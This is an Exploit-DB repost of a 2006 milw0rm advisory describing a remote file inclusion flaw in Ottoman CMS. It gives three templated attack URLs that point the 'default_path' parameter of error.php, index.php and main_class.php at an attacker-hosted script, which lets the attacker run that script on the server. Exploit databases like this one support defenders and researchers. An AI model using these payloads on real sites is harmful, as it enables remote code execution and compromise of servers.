Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)

EDB-ID:

1854

CVE:

2006-2767

EDB Verified:

Author:

Kacper

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-05-31

Vulnerable App:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# ottoman_v1_1_2 - Remote File Include Vulnerabilities
# Script site: http://prdownloads.sourceforge.net/ottoman/
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################

http://www.site.com/[Ottomanpath]/error.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/index.php?default_path=[evil_scripts]
http://www.site.com/[Ottomanpath]/classes/main_class.php?default_path=[evil_scripts]


#Elo ;-)

# milw0rm.com [2006-05-31]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services